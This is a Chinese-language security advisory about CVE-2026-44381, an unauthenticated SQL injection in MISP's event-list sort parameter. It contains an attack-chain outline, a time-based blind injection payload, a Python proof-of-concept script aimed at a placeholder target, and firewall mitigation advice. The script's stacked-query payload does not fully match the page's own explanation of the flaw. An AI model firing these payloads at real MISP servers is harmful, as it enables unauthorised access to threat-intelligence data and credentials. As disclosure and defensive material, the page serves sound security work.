IPBUF安全漏洞报告
English
CVE-2026-44381 CVSS 5.3 中危

CVE-2026-44381 MISP SQL注入漏洞

披露日期: 2026-05-13

漏洞信息

漏洞编号
CVE-2026-44381
漏洞类型
SQL注入
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
MISP

相关标签

SQL注入MISPCVE-2026-44381未授权访问数据泄露

漏洞概述

MISP开源威胁情报平台在2.5.37版本之前存在SQL注入漏洞。该漏洞源于事件和影子属性列表端点在处理用户控制的排序参数时缺乏充分验证。攻击者无需认证即可利用此漏洞,通过构造恶意的排序参数操纵SQL查询,从而导致未经授权的数据访问、查询行为修改或其他数据库层面的影响。

技术细节

该漏洞的根本原因在于MISP后端在构建数据库查询时,直接将用户请求中的`order`或`sort`参数拼接到SQL语句的`ORDER BY`子句中,而未对字段名进行严格的白名单校验。这种不安全的拼接方式允许攻击者注入恶意的SQL语法。在攻击利用阶段,由于`ORDER BY`子句的限制,攻击者通常无法直接使用`UNION SELECT`,但可以通过构造基于时间的盲注(Blind SQLi)Payload,例如利用`CASE WHEN`条件判断结合`SLEEP()`函数,根据服务器响应时间的差异来推断数据库中的敏感信息。鉴于CVSS向量显示攻击无需用户交互(UI:N)且无需认证(PR:N),该漏洞具有较高的可利用性,攻击者可远程批量扫描并提取威胁情报数据或凭证。

攻击链分析

STEP 1
侦察
攻击者通过网络扫描识别互联网上暴露的MISP实例。
STEP 2
武器化
攻击者构造针对排序参数的恶意SQL Payload(如盲注语句)。
STEP 3
交付与利用
向MISP的事件或影子属性列表端点发送包含恶意排序参数的HTTP GET/POST请求。
STEP 4
数据窃取
根据数据库响应时间或错误信息,提取敏感数据(如API密钥、用户哈希)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-44381 # This script demonstrates a time-based blind SQL injection # in the 'sort' parameter of the MISP event listing endpoint. import requests import time def check_sqli(url): # The payload attempts to cause a delay of 5 seconds # if the SQL syntax is executed correctly. payload = "id; SELECT SLEEP(5)--" params = { "sort": payload } try: print(f"[*] Testing target: {url}") start_time = time.time() response = requests.get(url, params=params, verify=False, timeout=10) end_time = time.time() elapsed = end_time - start_time if elapsed >= 5: print(f"[+] Vulnerability confirmed! Response took {elapsed:.2f} seconds.") else: print(f"[-] Vulnerability not detected or patched. Response took {elapsed:.2f} seconds.") except requests.RequestException as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target = "https://<misp-target>/events/index" check_sqli(target)

影响范围

MISP < 2.5.37

防御指南

临时缓解措施
如果无法立即升级,建议在Web应用防火墙(WAF)中添加规则,拦截所有包含SQL关键字(如SELECT, SLEEP, UNION)或特殊符号(如单引号、分号)的排序参数请求。同时,检查并临时禁用公开的未认证列表接口访问权限,直到完成修复。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表